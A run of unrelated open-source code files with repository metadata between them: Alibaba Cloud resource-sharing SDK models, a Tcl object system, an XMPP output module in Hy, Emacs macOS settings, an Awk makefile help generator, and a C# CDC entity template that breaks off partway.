updateTime?: string(name='UpdateTime'),
entityId?: string(name='EntityId'),
resourceShareName?: string(name='ResourceShareName'),
createTime?: string(name='CreateTime'),
entityType?: string(name='EntityType'),
resourceShareId?: string(name='ResourceShareId'),
associationStatusMessage?: string(name='AssociationStatusMessage'),
associationType?: string(name='AssociationType'),
associationStatus?: string(name='AssociationStatus'),
}
](name='ResourceShareAssociations'),
requestId?: string(name='RequestId'),
}
model DisassociateResourceShareResponse = {
headers: map[string]string(name='headers'),
body: DisassociateResourceShareResponseBody(name='body'),
}
async function disassociateResourceShareWithOptions(request: DisassociateResourceShareRequest, runtime: Util.RuntimeOptions): DisassociateResourceShareResponse {
Util.validateModel(request);
var query = {};
query["ResourceShareId"] = request.resourceShareId;
query["Resources"] = request.resources;
query["Targets"] = request.targets;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'DisassociateResourceShare',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function disassociateResourceShare(request: DisassociateResourceShareRequest): DisassociateResourceShareResponse {
var runtime = new Util.RuntimeOptions{};
return disassociateResourceShareWithOptions(request, runtime);
}
model ListResourceShareAssociationsRequest {
resourceId?: string(name='ResourceId'),
target?: string(name='Target'),
associationType?: string(name='AssociationType'),
associationStatus?: string(name='AssociationStatus'),
maxResults?: int32(name='MaxResults'),
nextToken?: string(name='NextToken'),
resourceShareIds?: [ string ](name='ResourceShareIds'),
}
model ListResourceShareAssociationsResponseBody = {
resourceShareAssociations?: [
{
updateTime?: string(name='UpdateTime'),
entityId?: string(name='EntityId'),
resourceShareName?: string(name='ResourceShareName'),
createTime?: string(name='CreateTime'),
entityType?: string(name='EntityType'),
resourceShareId?: string(name='ResourceShareId'),
associationStatusMessage?: string(name='AssociationStatusMessage'),
associationType?: string(name='AssociationType'),
associationStatus?: string(name='AssociationStatus'),
}
](name='ResourceShareAssociations'),
nextToken?: string(name='NextToken'),
requestId?: string(name='RequestId'),
}
model ListResourceShareAssociationsResponse = {
headers: map[string]string(name='headers'),
body: ListResourceShareAssociationsResponseBody(name='body'),
}
async function listResourceShareAssociationsWithOptions(request: ListResourceShareAssociationsRequest, runtime: Util.RuntimeOptions): ListResourceShareAssociationsResponse {
Util.validateModel(request);
var query = {};
query["ResourceId"] = request.resourceId;
query["Target"] = request.target;
query["AssociationType"] = request.associationType;
query["AssociationStatus"] = request.associationStatus;
query["MaxResults"] = request.maxResults;
query["NextToken"] = request.nextToken;
query["ResourceShareIds"] = request.resourceShareIds;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'ListResourceShareAssociations',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function listResourceShareAssociations(request: ListResourceShareAssociationsRequest): ListResourceShareAssociationsResponse {
var runtime = new Util.RuntimeOptions{};
return listResourceShareAssociationsWithOptions(request, runtime);
}
model ListResourceSharesRequest {
resourceOwner?: string(name='ResourceOwner'),
resourceShareName?: string(name='ResourceShareName'),
resourceShareStatus?: string(name='ResourceShareStatus'),
maxResults?: int32(name='MaxResults'),
nextToken?: string(name='NextToken'),
resourceShareIds?: [ string ](name='ResourceShareIds'),
}
model ListResourceSharesResponseBody = {
resourceShares?: [
{
updateTime?: string(name='UpdateTime'),
resourceShareName?: string(name='ResourceShareName'),
resourceShareOwner?: string(name='ResourceShareOwner'),
createTime?: string(name='CreateTime'),
resourceShareId?: string(name='ResourceShareId'),
resourceShareStatus?: string(name='ResourceShareStatus'),
}
](name='ResourceShares'),
nextToken?: string(name='NextToken'),
requestId?: string(name='RequestId'),
}
model ListResourceSharesResponse = {
headers: map[string]string(name='headers'),
body: ListResourceSharesResponseBody(name='body'),
}
async function listResourceSharesWithOptions(request: ListResourceSharesRequest, runtime: Util.RuntimeOptions): ListResourceSharesResponse {
Util.validateModel(request);
var query = {};
query["ResourceOwner"] = request.resourceOwner;
query["ResourceShareName"] = request.resourceShareName;
query["ResourceShareStatus"] = request.resourceShareStatus;
query["MaxResults"] = request.maxResults;
query["NextToken"] = request.nextToken;
query["ResourceShareIds"] = request.resourceShareIds;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'ListResourceShares',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function listResourceShares(request: ListResourceSharesRequest): ListResourceSharesResponse {
var runtime = new Util.RuntimeOptions{};
return listResourceSharesWithOptions(request, runtime);
}
model ListSharedResourcesRequest {
resourceOwner?: string(name='ResourceOwner'),
resourceType?: string(name='ResourceType'),
target?: string(name='Target'),
maxResults?: int32(name='MaxResults'),
nextToken?: string(name='NextToken'),
resourceShareIds?: [ string ](name='ResourceShareIds'),
resourceIds?: [ string ](name='ResourceIds'),
}
model ListSharedResourcesResponseBody = {
nextToken?: string(name='NextToken'),
requestId?: string(name='RequestId'),
sharedResources?: [
{
updateTime?: string(name='UpdateTime'),
resourceType?: string(name='ResourceType'),
createTime?: string(name='CreateTime'),
resourceShareId?: string(name='ResourceShareId'),
resourceId?: string(name='ResourceId'),
resourceStatus?: string(name='ResourceStatus'),
resourceStatusMessage?: string(name='ResourceStatusMessage'),
}
](name='SharedResources'),
}
model ListSharedResourcesResponse = {
headers: map[string]string(name='headers'),
body: ListSharedResourcesResponseBody(name='body'),
}
async function listSharedResourcesWithOptions(request: ListSharedResourcesRequest, runtime: Util.RuntimeOptions): ListSharedResourcesResponse {
Util.validateModel(request);
var query = {};
query["ResourceOwner"] = request.resourceOwner;
query["ResourceType"] = request.resourceType;
query["Target"] = request.target;
query["MaxResults"] = request.maxResults;
query["NextToken"] = request.nextToken;
query["ResourceShareIds"] = request.resourceShareIds;
query["ResourceIds"] = request.resourceIds;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'ListSharedResources',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function listSharedResources(request: ListSharedResourcesRequest): ListSharedResourcesResponse {
var runtime = new Util.RuntimeOptions{};
return listSharedResourcesWithOptions(request, runtime);
}
model ListSharedTargetsRequest {
resourceOwner?: string(name='ResourceOwner'),
resourceType?: string(name='ResourceType'),
resourceId?: string(name='ResourceId'),
maxResults?: int32(name='MaxResults'),
nextToken?: string(name='NextToken'),
resourceShareIds?: [ string ](name='ResourceShareIds'),
targets?: [ string ](name='Targets'),
}
model ListSharedTargetsResponseBody = {
nextToken?: string(name='NextToken'),
requestId?: string(name='RequestId'),
sharedTargets?: [
{
updateTime?: string(name='UpdateTime'),
createTime?: string(name='CreateTime'),
resourceShareId?: string(name='ResourceShareId'),
targetId?: string(name='TargetId'),
}
](name='SharedTargets'),
}
model ListSharedTargetsResponse = {
headers: map[string]string(name='headers'),
body: ListSharedTargetsResponseBody(name='body'),
}
async function listSharedTargetsWithOptions(request: ListSharedTargetsRequest, runtime: Util.RuntimeOptions): ListSharedTargetsResponse {
Util.validateModel(request);
var query = {};
query["ResourceOwner"] = request.resourceOwner;
query["ResourceType"] = request.resourceType;
query["ResourceId"] = request.resourceId;
query["MaxResults"] = request.maxResults;
query["NextToken"] = request.nextToken;
query["ResourceShareIds"] = request.resourceShareIds;
query["Targets"] = request.targets;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'ListSharedTargets',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function listSharedTargets(request: ListSharedTargetsRequest): ListSharedTargetsResponse {
var runtime = new Util.RuntimeOptions{};
return listSharedTargetsWithOptions(request, runtime);
}
model UpdateResourceShareRequest {
resourceShareId?: string(name='ResourceShareId'),
resourceShareName?: string(name='ResourceShareName'),
}
model UpdateResourceShareResponseBody = {
requestId?: string(name='RequestId'),
resourceShare?: {
updateTime?: string(name='UpdateTime'),
resourceShareName?: string(name='ResourceShareName'),
resourceShareOwner?: string(name='ResourceShareOwner'),
createTime?: string(name='CreateTime'),
resourceShareId?: string(name='ResourceShareId'),
resourceShareStatus?: string(name='ResourceShareStatus'),
}(name='ResourceShare'),
}
model UpdateResourceShareResponse = {
headers: map[string]string(name='headers'),
body: UpdateResourceShareResponseBody(name='body'),
}
async function updateResourceShareWithOptions(request: UpdateResourceShareRequest, runtime: Util.RuntimeOptions): UpdateResourceShareResponse {
Util.validateModel(request);
var query = {};
query["ResourceShareId"] = request.resourceShareId;
query["ResourceShareName"] = request.resourceShareName;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'UpdateResourceShare',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function updateResourceShare(request: UpdateResourceShareRequest): UpdateResourceShareResponse {
var runtime = new Util.RuntimeOptions{};
return updateResourceShareWithOptions(request, runtime);
}
| Tea | 4 | aliyun/alibabacloud-sdk | resourcesharing-20200110/main.tea | [
"Apache-2.0"
] |
insert into t0 values (6.0); | SQL | 1 | WizardXiao/tidb | br/tests/lightning_routes/data/routes_a0.t0.2.sql | [
"Apache-2.0"
] |
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
namespace eval pwoo {
variable classes [dict create]
variable classStack {}
variable cmdFlags [dict create]
variable verbose 0
namespace export class
proc class {className args} {
variable classes
variable classStack
if { [llength $classStack] > 0 } {
set className "[join $classStack "::"]::$className"
error "Nested classes are unsupported ($className)"
}
lappend classStack $className
set superClasses [dict create]
dict set superClasses public [list]
dict set superClasses private [list]
# working dict only merged with classes on success
set classDict [dict create]
vputs "Defining class $className"
if { 0 == [llength $args] } {
# assume forward declare "class clsName"
# dict count will be set below as placeholder
set sfx ""
if { [classExists $className] } {
set sfx " (Redundant)"
}
vputs " Forward declare$sfx"
} elseif { [classBodyExists $className] } {
error "Class body already exists for '$className'"
} elseif { 1 == [llength $args] } {
# assume args == "body"
dict set classDict $className body [lindex $args 0]
} elseif { ":" != [lindex $args 0] || [llength $args] < 3 } {
# too few args - minimal args == ": superClassName body"
error "Invalid class declaration at '[string range $args 0 30]'"
} else {
# assume args == ": public|private superClassName... body"
# body must be last arg
dict set classDict $className body [lindex $args end]
# strip off first and last args
set args [lrange $args 1 end-1]
# process remaining args as visibility flags or superclasses
set superClassVis private
foreach arg $args {
switch $arg {
public -
private {
set superClassVis $arg
}
default {
# arg must be a class name
addSuperClass $arg $superClassVis superClasses
}
}
}
}
if { [dict exists $classDict $className body] } {
set classDeclare::className $className
set classDeclare::classDict [dict create]
namespace eval classDeclare [dict get $classDict $className body]
set classDict [dict merge $classDict $classDeclare::classDict]
## make procs in classDeclare visible to $className namespace
#namespace eval $className {namespace path ::pwoo::classDeclare}
##namespace upvar ns classDict classDict
#
## process class body declaration
#namespace eval $className [dict get $classDict $className body]
#
#vputs " $className vars: [info vars ::pwoo::${className}::*]"
}
if { ![classBodyExists $className] } {
dict set classDict $className count 0
dict set classDict $className superclasses public [dict get $superClasses public]
dict set classDict $className superclasses private [dict get $superClasses private]
set classes [dict merge $classes $classDict]
}
unset classDict
vputs "End class $className"
vputs ""
# strip last item from list - needed when nested classes are implemented
set classStack [lreplace $classStack end end]
}
namespace export new
proc new {className args} {
variable classes
if { ![classExists $className] } {
error "Could not instantiate undefined class '$className'."
} elseif { ![classBodyExists $className] } {
error "Could not instantiate incomplete class '$className'."
}
set key [dict get $classes $className count]
set body [dict get $classes $className body]
set cmd ${className}_${key}
vputs ""
vputs "new '$className'"
vputs " cmd: '$cmd'"
vputs " path: '[namespace eval $cmd {namespace path}]'"
# make procs in classInstance visible to object's namespace
namespace eval $cmd {namespace path ::pwoo::classInstance}
# load class body into object namespace
namespace eval $cmd $body
# Declare the this variable in object namespace
namespace eval $cmd [list variable this $cmd]
# Create object namespace ensemble
namespace eval $cmd [list namespace ensemble create -command ::$cmd]
# exec object ctor if one defined
if { [ctorFlag $cmd] } {
set ctor [makeCtorName $cmd]
vputs " ctor: $ctor"
namespace eval $cmd [list $ctor {*}$args]
} else {
vputs " ctor: not defined"
}
if { [dtorFlag $cmd] } {
vputs " dtor: class defined"
} else {
vputs " dtor: created default"
namespace eval $cmd {destructor {}}
}
dict set classes $className count [incr key]
# hide classInstance procs
namespace eval $cmd {namespace path ""}
vputs " $cmd methods: [namespace eval $cmd {namespace export}]"
vputs ""
return $cmd
}
proc vputs { {msg ""} } {
variable verbose
if { $verbose } {
puts $msg
}
}
proc veval { script } {
variable verbose
if { $verbose } {
uplevel 1 $script
}
}
proc setCmdFlag { cmd flag val } {
variable cmdFlags
dict set cmdFlags $cmd $flag $val
}
proc getCmdFlag { cmd flag defVal } {
variable cmdFlags
if { ![dict exists $cmdFlags $cmd $flag] } {
set val $defVal
} else {
set val [dict get $cmdFlags $cmd $flag]
}
return $val
}
proc setVisiblityFlag { cmd val } {
setCmdFlag $cmd visibility $val
}
proc visiblityFlag { cmd {defVis private} } {
return [getCmdFlag $cmd visibility $defVis]
}
proc setCtorFlag { cmd val } {
setCmdFlag $cmd hasCtor $val
}
proc ctorFlag { cmd } {
return [getCmdFlag $cmd hasCtor 0]
}
proc setDtorFlag { cmd val } {
setCmdFlag $cmd hasDtor $val
}
proc dtorFlag { cmd } {
return [getCmdFlag $cmd hasDtor 0]
}
proc dumpDict {} {
variable classes
puts "*** BEGIN pwoo::classes ***"
dict for {className classAttrs} $classes {
set status ""
if { ![classBodyExists $className] } {
set status " INCOMPLETE"
}
puts "*** ${className}${status} ***"
dict for {attrName attrVal} $classAttrs {
if {"body" == $attrName } {
set attrVal "'[string range $attrVal 0 30] ... [string range $attrVal end-30 end]'"
}
puts " $attrName: $attrVal"
}
puts "*** END pwoo::classes ***"
puts ""
}
}
proc addSuperClass { superClassName visibility superClassesVar errVar } {
upvar $superClassesVar superClasses
upvar $errVar err
set ret 0
if { 1 != [llength $superClassName] } {
# spaces not allowed in name
error "Invalid superclass name '$superClassName'"
} elseif { ![classExists $superClassName] } {
error "Superclass does not exist '$superClassName'"
} elseif { -1 != [lsearch [dict get $superClasses public] $superClassName] } {
error "Duplicate public superclass '$superClassName'"
} elseif { -1 != [lsearch [dict get $superClasses private] $superClassName] } {
error "Duplicate private superclass '$superClassName'"
} else {
dict lappend superClasses $visibility $superClassName
set ret 1
}
return $ret
}
proc createMethod {ns vis methName methArgs body} {
# create proc for method in namespace $ns. Inject the 'this'
# variable into the body of the proc
namespace eval $ns [list proc $methName $methArgs [concat {variable this ;} $body]]
if { $vis == "public" } {
namespace eval $ns [list namespace export $methName]
}
vputs " METHOD of $ns\n"
vputs " visibility: '$vis'"
vputs " method : '$methName'"
vputs " args : '[concat $methArgs]'"
vputs ""
}
proc setVerbose { val } {
variable verbose
set verbose $val
}
proc isVerbose {} {
variable verbose
return $verbose
}
proc classExists { className } {
variable classes
return [dict exists $classes $className count]
}
proc classBodyExists { className } {
variable classes
return [dict exists $classes $className body]
}
proc makeCtorName { cmd } {
return "$cmd"
}
proc makeDtorName { cmd } {
return "delete"
}
}
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
namespace eval pwoo::classDeclare {
namespace path ::pwoo
variable className
variable classDict
proc constructor {ctorArgs body} {
puts " constructor \{ [concat $ctorArgs] \} \{[string range [concat $body] 0 30]...\}"
#set ns [uplevel 1 {namespace current}]
#set cmd [namespace tail $ns]
#createMethod $ns private [makeCtorName $cmd] $ctorArgs $body
#setCtorFlag $cmd 1
}
proc destructor {body} {
puts " destructor \{[string range [concat $body] 0 30]...\}"
#set ns [uplevel 1 {namespace current}]
#set cmd [namespace tail $ns]
#createMethod $ns public [makeDtorName $cmd] {} [concat $body \; namespace delete $ns]
#setDtorFlag $cmd 1
}
proc method {methName methArgs body} {
puts " method $methName \{ [concat $methArgs] \} \{[string range [concat $body] 0 30]...\}"
#set ns [uplevel 1 {namespace current}]
#createMethod $ns [visiblityFlag [namespace tail $ns]] $methName $methArgs $body
}
proc private: {} {
puts " PRIVATE"
#set ns [uplevel 1 {namespace current}]
#setVisiblityFlag [namespace tail $ns] private
}
proc public: {} {
puts " PUBLIC"
#set ns [uplevel 1 {namespace current}]
#setVisiblityFlag [namespace tail $ns] public
}
proc variable { name args } {
puts " variable $name \{$args\}"
#vputs " class variable [uplevel 1 {namespace current}]::$name"
#uplevel 1 [list ::variable $name]
set ns [uplevel 1 {namespace current}]
addClassVariable [namespace tail $ns] $name $args
}
proc addClassVariable { cmd varName varValue } {
::variable classDict
}
}
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
namespace eval pwoo::classInstance {
namespace path ::pwoo
proc constructor {ctorArgs body} {
set ns [uplevel 1 {namespace current}]
set cmd [namespace tail $ns]
createMethod $ns private [makeCtorName $cmd] $ctorArgs $body
setCtorFlag $cmd 1
}
proc destructor {body} {
set ns [uplevel 1 {namespace current}]
set cmd [namespace tail $ns]
createMethod $ns public [makeDtorName $cmd] {} [concat $body \; namespace delete $ns]
setDtorFlag $cmd 1
}
proc method {methName methArgs body} {
set ns [uplevel 1 {namespace current}]
createMethod $ns [visiblityFlag [namespace tail $ns]] $methName $methArgs $body
}
proc private: {} {
set ns [uplevel 1 {namespace current}]
setVisiblityFlag [namespace tail $ns] private
}
proc public: {} {
set ns [uplevel 1 {namespace current}]
setVisiblityFlag [namespace tail $ns] public
}
proc variablex { name args } {
vputs " variable [uplevel 1 {namespace current}]::$name $args"
uplevel 1 [list ::variable $name {*}$args]
}
}
| Glyph | 5 | smola/language-dataset | data/github.com/dbgarlisch/glyph-pwoo/108ef6d8bde1be394727a00ab023c156c1b10920/pwoo.glf | [
"MIT"
] |
namespace OpenAPI.Model
open System
open System.Collections.Generic
module Tag =
//#region Tag
type Tag = {
Id : int64;
Name : string;
}
//#endregion
| F# | 4 | MalcolmScoffable/openapi-generator | samples/server/petstore/fsharp-giraffe/OpenAPI/src/model/Tag.fs | [
"Apache-2.0"
] |
(import processor)
(import time)
(require processor.utils.macro)
(defn xmpp [jid password host &optional [port 5222] [recipients []]]
(import-or-error [sleekxmpp [ClientXMPP]]
"Please, install 'sleekxmpp' library to use 'xmpp' source.")
(defclass Bot [ClientXMPP]
(defn __init__ [self jid password recipients]
(.__init__ (super Bot self) jid password)
(setv self.recipients recipients)
(self.add_event_handler "session_start" self.start))
(defn start [self event]
(self.send_presence)
(self.get_roster))
(defn send_to_recipients [self message recipients]
(setv recipients (or recipients
self.recipients))
(for [recipient recipients]
(apply self.send_message [] {"mto" recipient "mbody" message}))))
(setv bot (Bot jid password recipients))
(bot.register_plugin "xep_0030") ;; Service Discovery
(bot.register_plugin "xep_0199") ;; XMPP Ping
(bot.connect [host port])
(processor.on_close (fn [] (do (time.sleep 1)
(apply bot.disconnect [] {"wait" True}))))
(apply bot.process [] {"block" False})
;; actual message sending function
(fn [item]
(bot.send_to_recipients (item.get "text" "Not given")
(item.get "recipients"))))
| Hy | 5 | svetlyak40wt/python-processor | src/processor/outputs/xmpp.hy | [
"BSD-2-Clause"
] |
;;; os/macos/config.el -*- lexical-binding: t; -*-
;;
;;; Reasonable defaults for macOS
;; Use spotlight search backend as a default for M-x locate (and helm/ivy
;; variants thereof), since it requires no additional setup.
(setq locate-command "mdfind")
;;
;;; Compatibilty fixes
;; Curse Lion and its sudden but inevitable fullscreen mode!
;; NOTE Meaningless to railwaycat's emacs-mac build
(setq ns-use-native-fullscreen nil)
;; Visit files opened outside of Emacs in existing frame, not a new one
(setq ns-pop-up-frames nil)
;; sane trackpad/mouse scroll settings
(setq mac-redisplay-dont-reset-vscroll t
mac-mouse-wheel-smooth-scroll nil)
;; Sets `ns-transparent-titlebar' and `ns-appearance' frame parameters so window
;; borders will match the enabled theme.
(and (or (daemonp)
(display-graphic-p))
(require 'ns-auto-titlebar nil t)
(ns-auto-titlebar-mode +1))
;; HACK On MacOS, disabling the menu bar makes MacOS treat Emacs as a
;; non-application window -- which means it doesn't automatically capture
;; focus when it is started, among other things, so enable the menu-bar for
;; GUI frames, but keep it disabled in terminal frames because there it
;; activates an ugly, in-frame menu bar.
(add-hook! '(window-setup-hook after-make-frame-functions)
(defun doom-init-menu-bar-in-gui-frames-h (&optional frame)
"Re-enable menu-bar-lines in GUI frames."
(when-let (frame (or frame (selected-frame)))
(when (display-graphic-p frame)
(set-frame-parameter frame 'menu-bar-lines 1)))))
;; Integrate with Keychain
(after! auth-source
(pushnew! auth-sources 'macos-keychain-internet 'macos-keychain-generic))
;;
;;; Packages
(use-package! osx-trash
:commands osx-trash-move-file-to-trash
:init
;; Delete files to trash on macOS, as an extra layer of precaution against
;; accidentally deleting wanted files.
(setq delete-by-moving-to-trash t)
;; Lazy load `osx-trash'
(and IS-MAC
(not (fboundp 'system-move-file-to-trash))
(defalias #'system-move-file-to-trash #'osx-trash-move-file-to-trash)))
| Emacs Lisp | 4 | leezu/doom-emacs | modules/os/macos/config.el | [
"MIT"
] |
<!DOCTYPE html>
<html>
<head>
<title>Foo</title>
</head>
<img src="{basdsada as $field}" />
<div n:syntax="asp">
<img src="<%basdsada a^s $field%>" />
</div>
</html> | Latte | 1 | timfel/netbeans | php/php.latte/test/unit/data/testfiles/actions/toggleComment/testIssue230261_11.latte | [
"Apache-2.0"
] |
// We can not import reference of `./index` directly since it will make dead loop in less
@import (reference) '../../style/themes/index';
@cascader-prefix-cls: ~'@{ant-prefix}-cascader';
.@{cascader-prefix-cls}-rtl {
.@{cascader-prefix-cls}-menu-item {
&-expand-icon,
&-loading-icon {
margin-right: @padding-xss;
margin-left: 0;
}
}
.@{cascader-prefix-cls}-checkbox {
top: 0;
margin-right: 0;
margin-left: @padding-xs;
}
}
| Less | 3 | jawmeschege/ant-design | components/cascader/style/rtl.less | [
"MIT"
] |
# Awk program for automatically generating help text from those ludicrous makefiles.
# See help.mk for details.
function len(a, i, k) {
for (i in a) k++
return k
}
function join(a, sep) {
result = ""
if (sep == "")
sep = SUBSEP
for (item in a)
result = result sep a[item]
return result
}
function unjoin(a, text, sep) {
if (sep == "")
sep = SUBSEP
split(substr(text, 2), a, sep)
}
function append(a, item) {
a[len(a) + 1] = item
}
function extend(a, b) {
for (item in b)
append(a, b[item])
}
/^#> / {
comments[++comments_counter] = substr($0, 4)
}
/^[^: \t]*:[^;]*;?/ {
split($0, recipe_firstline, ":")
target = recipe_firstline[1]
width = length(target)
max_width = (max_width > width) ? max_width : width
if ( substr(lastline, 1, 2) == "#>" ) {
target_docs[target] = join(comments, "#")
delete comments
}
}
!/^#>/ {
if (len(comments) > 0) {
extend(global_docs, comments)
append(global_docs, "")
delete comments
}
}
{ lastline = $0 }
END {
for (doc in global_docs)
print global_docs[doc]
printf "Targets:\n"
for (target in target_docs) {
unjoin(help, target_docs[target], "#")
printf " %-" max_width "s %s\n", target, help[1]
for (i = 2; i <= len(help); i++)
printf " %-" max_width "s %s\n", "", help[i]
}
}
| Awk | 4 | Young-Li-wxx/Hero | .makefiles/help.awk | [
"MIT"
] |
{{! Copyright (c) Avanade. Licensed under the MIT License. See https://github.com/Avanade/Beef }}
/*
* This file is automatically generated; any changes will be lost.
*/
#nullable enable
#pragma warning disable
{{#ifval ColumnIsDeleted}}
using Beef.Data.Database.Cdc;
{{/ifval}}
using Beef.Entities;
using Beef.Mapper;
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
using Newtonsoft.Json;
{{/ifeq}}
using System;
using System.Collections.Generic;
namespace {{Root.NamespaceCdc}}.Entities
{
/// <summary>
/// Represents the CDC model for the root (primary) database table '{{Schema}}.{{Name}}'.
/// </summary>
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
[JsonObject(MemberSerialization = MemberSerialization.OptIn)]
{{/ifeq}}
public partial class {{ModelName}}Cdc : IUniqueKey, IETag{{#ifval ColumnIsDeleted}}, ILogicallyDeleted{{/ifval}}
{
{{#each SelectedEntityColumns}}
/// <summary>
/// Gets or sets the '{{Name}}' column value.
/// </summary>
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
[JsonProperty("{{camel NameAlias}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
{{/ifeq}}
public {{DotNetType}}{{#if IsDotNetNullable}}?{{/if}} {{pascal NameAlias}} { get; set; }
{{#unless @last}}
{{else}}
{{#ifne Parent.JoinNonCdcChildren.Count 0}}
{{/ifne}}
{{/unless}}
{{/each}}
{{#each JoinNonCdcChildren}}
{{#each Columns}}
/// <summary>
/// Gets or sets the '{{Name}}' column value (join table '{{Parent.Schema}}.{{Parent.Name}}').
/// </summary>
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
[JsonProperty("{{camel NameAlias}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
{{/ifeq}}
public {{DotNetType}}{{#if IsDotNetNullable}}?{{/if}} {{pascal NameAlias}} { get; set; }
{{#unless @last}}
{{else}}
{{#unless @../last}}
{{/unless}}
{{/unless}}
{{/each}}
{{/each}}
{{#each JoinCdcChildren}}
{{#ifeq JoinCardinality 'OneToMany'}}
/// <summary>
/// Gets or sets the related (one-to-many) <see cref="{{Parent.ModelName}}Cdc.{{ModelName}}Collection"/> (database table '{{Schema}}.{{TableName}}').
/// </summary>
[JsonProperty("{{camel PropertyName}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
[MapperIgnore()]
public {{Parent.ModelName}}Cdc.{{ModelName}}CdcCollection? {{PropertyName}} { get; set; }
{{else}}
/// <summary>
/// Gets or sets the related (one-to-one) <see cref="{{Parent.ModelName}}Cdc.{{ModelName}}"/> (database table '{{Schema}}.{{TableName}}').
/// </summary>
[JsonProperty("{{camel PropertyName}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
[MapperIgnore()]
public {{Parent.ModelName}}Cdc.{{ModelName}}Cdc? {{PropertyName}} { get; set; }
{{/ifeq}}
{{/each}}
/// <summary>
/// Gets or sets the entity tag {{#ifval ColumnRowVersion}}('{{ColumnRowVersion.Name}}' column){{else}}(calculated as JSON serialized hash value){{/ifval}}.
/// </summary>
[JsonProperty("etag", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
{{#ifval ColumnRowVersion}}
[MapperProperty("{{ColumnRowVersion.Name}}", ConverterType = typeof(Beef.Data.Database.DatabaseRowVersionConverter))]
{{else}}
[MapperIgnore()]
{{/ifval}}
public string? ETag { get; set; }
{{#ifval ColumnIsDeleted}}
/// <summary>
/// Indicates whether the entity is logically deleted ('{{ColumnIsDeleted.Name}}' column).
/// </summary>
[MapperProperty("{{ColumnIsDeleted.Name}}")]
public bool IsDeleted { get; set; }
{{/ifval}}
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public bool HasUniqueKey => true;
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public UniqueKey UniqueKey => new UniqueKey({{#each PrimaryKeyColumns}}{{#unless @first}}, {{/unless}}{{pascal NameAlias}}{{/each}});
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public string[] UniqueKeyProperties => new string[] { {{#each PrimaryKeyColumns}}{{#unless @first}}, {{/unless}}nameof({{pascal NameAlias}}){{/each}} };
{{#each CdcJoins}}
#region {{ModelName}}Cdc
/// <summary>
/// Represents the CDC model for the related (child) database table '{{Schema}}.{{TableName}}' (known uniquely as '{{Name}}').
/// </summary>
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
[JsonObject(MemberSerialization = MemberSerialization.OptIn)]
{{/ifeq}}
public partial class {{ModelName}}Cdc : IUniqueKey
{
{{#each Columns}}
/// <summary>
/// Gets or sets the '{{NameAlias}}' ({{Parent.TableName}}.{{Name}}) column value.
/// </summary>
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
[JsonProperty("{{camel NameAlias}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
{{/ifeq}}
public {{DotNetType}}{{#if IsDotNetNullable}}?{{/if}} {{pascal NameAlias}} { get; set; }
{{#unless @last}}
{{else}}
{{#ifne Parent.JoinNonCdcChildren.Count 0}}
{{/ifne}}
{{/unless}}
{{/each}}
{{#each JoinNonCdcChildren}}
{{#each Columns}}
/// <summary>
/// Gets or sets the '{{Name}}' column value (join table '{{Parent.Schema}}.{{Parent.Name}}').
/// </summary>
{{#ifeq Root.JsonSerializer 'Newtonsoft'}}
[JsonProperty("{{camel NameAlias}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
{{/ifeq}}
